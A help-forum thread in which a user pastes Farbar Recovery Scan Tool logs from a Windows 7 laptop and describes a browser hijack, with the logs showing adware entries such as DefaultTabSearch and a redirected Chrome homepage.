Faulting module name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
Exception code: 0xc0000005
Fault offset: 0x00002c80
Faulting process id: 0x72c
Faulting application start time: 0xDefaultTabSearch.exe0
Faulting application path: DefaultTabSearch.exe1
Faulting module path: DefaultTabSearch.exe2
Report Id: DefaultTabSearch.exe3
Error: (05/25/2014 06:12:58 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:12:50 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
Faulting module name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
Exception code: 0xc0000005
Fault offset: 0x00002c80
Faulting process id: 0x748
Faulting application start time: 0xDefaultTabSearch.exe0
Faulting application path: DefaultTabSearch.exe1
Faulting module path: DefaultTabSearch.exe2
Report Id: DefaultTabSearch.exe3
Error: (05/25/2014 05:46:49 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 05:46:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
Faulting module name: DefaultTabSearch.exe, version: 0.0.0.0, time stamp: 0x52b3b87c
Exception code: 0xc0000005
Fault offset: 0x00002c80
Faulting process id: 0x74c
Faulting application start time: 0xDefaultTabSearch.exe0
Faulting application path: DefaultTabSearch.exe1
Faulting module path: DefaultTabSearch.exe2
Report Id: DefaultTabSearch.exe3

System errors:
=============
Error: (05/25/2014 07:19:17 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Rapid Start Technology Service service terminated unexpectedly. It has done this 1 time(s).
Error: (05/25/2014 07:11:41 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
Error: (05/25/2014 07:11:40 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Internet Speed TrackerService service failed to start due to the following error: 
%%2
Error: (05/25/2014 06:21:14 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The DefaultTabSearch service terminated unexpectedly. It has done this 1 time(s).
Error: (05/25/2014 06:21:12 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
Error: (05/25/2014 06:12:51 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The DefaultTabSearch service terminated unexpectedly. It has done this 1 time(s).
Error: (05/25/2014 06:12:48 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
Error: (05/25/2014 06:12:06 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}
Error: (05/25/2014 05:56:09 AM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
Error: (05/25/2014 05:55:16 AM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{6C3D7BE0-3E9D-4A7B-83BC-B468C2909801} because another computer on the network has the same name. The server could not start.

Microsoft Office Sessions:
=========================
Error: (05/25/2014 07:12:00 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:21:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:21:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: DefaultTabSearch.exe0.0.0.052b3b87cDefaultTabSearch.exe0.0.0.052b3b87cc000000500002c8072c01cf779e77ac2c8fC:\Program Files (x86)\DefaultTab\DefaultTabSearch.exeC:\Program Files (x86)\DefaultTab\DefaultTabSearch.exeb6d5a34f-e391-11e3-919d-7ce9d3d1a3de
Error: (05/25/2014 06:12:58 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 06:12:50 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: DefaultTabSearch.exe0.0.0.052b3b87cDefaultTabSearch.exe0.0.0.052b3b87cc000000500002c8074801cf779d4b532aa0C:\Program Files (x86)\DefaultTab\DefaultTabSearch.exeC:\Program Files (x86)\DefaultTab\DefaultTabSearch.exe8ae2dd39-e390-11e3-b16d-7ce9d3d1a3de
Error: (05/25/2014 05:46:49 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (05/25/2014 05:46:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: DefaultTabSearch.exe0.0.0.052b3b87cDefaultTabSearch.exe0.0.0.052b3b87cc000000500002c8074c01cf779993915344C:\Program Files (x86)\DefaultTab\DefaultTabSearch.exeC:\Program Files (x86)\DefaultTab\DefaultTabSearch.exed2fae039-e38c-11e3-b44e-7ce9d3d1a3de

==================== Memory info =========================== 
Percentage of memory in use: 46%
Total physical RAM: 4041.43 MB
Available physical RAM: 2171.45 MB
Total Pagefile: 8081.05 MB
Available Pagefile: 6177.66 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:97.21 GB) (Free:1.15 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Recovery) (Fixed) (Total:17.74 GB) (Free:1.94 GB) NTFS ==>[System with boot components (obtained from reading drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 119 GB) (Disk ID: 782B1BF2)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=18 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=4 GB) - (Type=OF Extended)
==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

*Although the pop up has disappeared, the 2 pop up webpages still keep appearing, but are empty, the virus seems to have taken over both Google and Google Chrome - sometimes sending me to fake pages - especially for online banking. It also blocks this site - except sometimes through Chrome. I read a previous thread before and ran ComboFix as suggested. I had all firewalls etc off. This did not work. I have just run FRST 64 again and paste below the new text file: *

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-05-2014 02
Ran by Hewlett Packard (administrator) on HEWLETTPACKARD on 27-05-2014 17:10:42
Running from C:\Users\Hewlett Packard\Downloads
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(HP) C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
() C:\Program Files (x86)\SMART BRO\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hightail, Inc.) C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
() C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Dropbox, Inc.) C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Windows (R) Win 7 DDK provider) C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
() C:\Program Files (x86)\SMART BRO\UIExec.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\Ymsgr_tray.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-10-06] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-10-01] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-13] (Hightail, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-20] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1343904 2012-11-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [FLxHCIm64] => C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe [55536 2013-06-05] (Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UIExec] => C:\Program Files (x86)\SMART BRO\UIExec.exe [156448 2012-05-11] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [311616 2014-04-23] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [Buffalo RUNONCE] => C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-05-13] (Hewlett-Packard)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6160152 2014-05-20] (Piriform Ltd)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [20922016 2014-02-10] (Skype Technologies S.A.)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Messenger (Yahoo!)] => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [6595928 2012-05-25] (Yahoo! Inc.)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.co.uk/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^BBQ^xdm039^YYA^ph&si=D2DPH&ptb=F3A8AB28-EF6C-4986-A25E-13ECC248CEF7&ind=2014031220&n=780bad74&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - DefaultScope {EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^BBQ^xdm039^YYA^ph&si=D2DPH&ptb=F3A8AB28-EF6C-4986-A25E-13ECC248CEF7&ind=2014031220&n=780bad74&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} URL = https://www.google.com/search?q={searchTerms}
BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll (HP)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll (HP)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: No Name - {9e28b297-11d4-4293-aa6f-558658ee66ae} - No File
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: No Name - {cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - No Name - {665cb5b7-4c3b-4995-8cec-1f4d5860edc9} - No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FE9B027C-FDEE-4719-AA08-5F56C19B41F3}: [NameServer]8.8.8.8 8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @InternetSpeedTracker_9t.com/Plugin - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\NP9tStub.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: DvrClientPlugin - C:\Program Files (x86)\DVRClient Plug-in\npDVRClient.dll ()
FF Plugin HKCU: bluejeans.com/bjninstallplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll (Blue Jeans)
FF Plugin HKCU: bluejeans.com/bjnplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll (Blue Jeans)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\ []
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF [2013-11-25]

Chrome: 
=======
CHR HomePage: hxxp://www.mysearchresults.com/?c=3523&t=01
CHR StartupUrls: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: search here
CHR DefaultSearchProvider: Search Here
CHR DefaultSearchURL: http://www.mysearchresults.com/search?c=3523&t=01&q={searchTerms}
CHR DefaultNewTabURL: 
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.450.18) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U45) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Live&#153; Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll No File
